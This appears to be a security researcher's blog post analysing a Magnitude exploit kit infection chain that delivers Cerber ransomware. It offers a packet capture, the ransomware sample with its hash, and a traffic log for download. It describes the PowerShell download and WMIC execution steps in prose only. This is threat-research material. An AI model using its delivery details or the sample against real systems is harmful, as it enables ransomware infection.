- Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.
- A few previous Magnitude EK posts from me.
Downloads (in password protected zip)
- 28-June-Magnitude-Cerber-PCAP– PCAP of Magnitude and Cerber
- 28-June-2017-Cerber – Cerber (a.exe – efe238b3d28c819b27abe668d1188d7534101bcf9a1cfef0c7d56e33b00b8424)
- 28-June-Magnitude-Cerber-CSV – CSV of traffic with resolved IP addresses.
Details of infection chain:
(click to enlarge!)
At some point I hope to take a deep dive into Magnitude EK, mostly focusing on deobfuscation. The first gate for example uses your “window.screen” object to generate the next URL and it’s quite interesting.
Although not shown in the main picture, a new trend for Magnitude is a double landing page which causes duplicate traffic.
For now here is a list of processes that were executed:
You can see the Scriplet is ran which drops 3 payloads all of which fail. I’m not sure why they fail but it’s possible that as the Flash request is one of the very first requests in the actual landing page and that Magnitude has already decided how to drop the payload and thus these fail. I will try it one day without Flash.
A PowerShell command is ran to download a file called “b.exe” and finally WMIC is used to run the payload “a.exe“.
The payload is of course Cerber Ransomware. This version calls itself “CBRB”.
When i submitted to VT it has relatively few detection’s and none directly refer to it as Cerber though some vendors may call it other things.
|Detection ratio:||13 / 61|